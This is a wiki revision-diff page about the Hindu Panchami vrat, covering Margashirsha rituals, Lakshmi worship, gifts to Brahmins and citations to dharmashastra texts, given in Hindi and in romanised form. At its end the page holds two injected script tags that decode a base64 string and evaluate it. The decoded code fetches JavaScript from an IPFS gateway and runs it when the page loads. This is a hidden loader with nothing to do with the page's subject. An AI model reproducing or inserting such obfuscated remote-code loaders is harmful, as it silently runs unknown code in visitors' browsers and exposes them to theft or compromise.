Difference between revisions of "पंचमी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ते है।" to "ते हैं।")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] की पंचमी को सूर्योदय काल में व्रत के नियमों का संकल्प लिया जाता है।
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] की पंचमी को सूर्योदय काल में व्रत के नियमों का संकल्प लिया जाता है।
*स्वर्ण, रजत, पीतल, ताम्र या काष्ठ की लक्ष्मी प्रतिमा या वस्त्र पर लक्ष्मी का चित्र, पुष्पों आदि से सिर से पैर तक की पूजा की जाती है।
+
*स्वर्ण, रजत, [[पीतल]], ताम्र या काष्ठ की लक्ष्मी प्रतिमा या वस्त्र पर लक्ष्मी का चित्र, पुष्पों आदि से सिर से पैर तक की पूजा की जाती है।
 
*सधवा नारियों का पुष्पों, कुंकुम एवं मिष्ठान के थालों से सम्मान।
 
*सधवा नारियों का पुष्पों, कुंकुम एवं मिष्ठान के थालों से सम्मान।
 
*एक पसर (प्रस्थ) चावल एवं घृतपूर्ण पात्र का 'श्री का हृदय प्रसन्न हों' के साथ दान दिया जाता है।
 
*एक पसर (प्रस्थ) चावल एवं घृतपूर्ण पात्र का 'श्री का हृदय प्रसन्न हों' के साथ दान दिया जाता है।
 
*प्रत्येक मास में लक्ष्मी के विभिन्न नामों से पूजा की जाती है।
 
*प्रत्येक मास में लक्ष्मी के विभिन्न नामों से पूजा की जाती है।
 
*प्रतिमा का ब्राह्मण को दान दिया जाता है।<ref>भविष्योत्तरपुराण (37|38-58)।</ref>
 
*प्रतिमा का ब्राह्मण को दान दिया जाता है।<ref>भविष्योत्तरपुराण (37|38-58)।</ref>
*पंचमी के 7 व्रत होते हैं।<ref>(कृत्यकल्पतरु 87-97)</ref>  
+
*पंचमी के 7 व्रत होते हैं।<ref>कृत्यकल्पतरु 87-97</ref>  
 
*हेमाद्रि<ref>हेमाद्रि व्रतखण्ड 1, 536-576</ref> ने 28 व्रतों के नाम लिये हैं।<ref> कालनिर्णय (186-188); तिथितत्त्व (32-34); पुरुषार्थचिन्तामणि (95-100); व्रतराज (192-220)।</ref>  
 
*हेमाद्रि<ref>हेमाद्रि व्रतखण्ड 1, 536-576</ref> ने 28 व्रतों के नाम लिये हैं।<ref> कालनिर्णय (186-188); तिथितत्त्व (32-34); पुरुषार्थचिन्तामणि (95-100); व्रतराज (192-220)।</ref>  
 
*सभी पंचमी उपवासों (केवल नागपंचमी एवं स्कन्द उपवास को छोड़कर) में चतुर्थी से युक्त पंचमी को वरीयता दी जानी चाहिए।<ref>कालनिर्णय (188); निर्णयामृत (44-45); पुरुषार्थचिन्तामणि (96)।</ref>  
 
*सभी पंचमी उपवासों (केवल नागपंचमी एवं स्कन्द उपवास को छोड़कर) में चतुर्थी से युक्त पंचमी को वरीयता दी जानी चाहिए।<ref>कालनिर्णय (188); निर्णयामृत (44-45); पुरुषार्थचिन्तामणि (96)।</ref>  
 +
  
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 08:44, 9 June 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl paksh ki panchami ko sooryoday kal mean vrat ke niyamoan ka sankalp liya jata hai.
  • svarn, rajat, pital, tamr ya kashth ki lakshmi pratima ya vastr par lakshmi ka chitr, pushpoan adi se sir se pair tak ki pooja ki jati hai.
  • sadhava nariyoan ka pushpoan, kuankum evan mishthan ke thaloan se samman.
  • ek pasar (prasth) chaval evan ghritapoorn patr ka 'shri ka hriday prasann hoan' ke sath dan diya jata hai.
  • pratyek mas mean lakshmi ke vibhinn namoan se pooja ki jati hai.
  • pratima ka brahman ko dan diya jata hai.[1]
  • panchami ke 7 vrat hote haian.[2]
  • hemadri[3] ne 28 vratoan ke nam liye haian.[4]
  • sabhi panchami upavasoan (keval nagapanchami evan skand upavas ko chho dakar) mean chaturthi se yukt panchami ko variyata di jani chahie.[5]


tika tippani aur sandarbh

  1. bhavishyottarapuran (37|38-58).
  2. krityakalpataru 87-97
  3. hemadri vratakhand 1, 536-576
  4. kalanirnay (186-188); tithitattv (32-34); purusharthachintamani (95-100); vrataraj (192-220).
  5. kalanirnay (188); nirnayamrit (44-45); purusharthachintamani (96).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>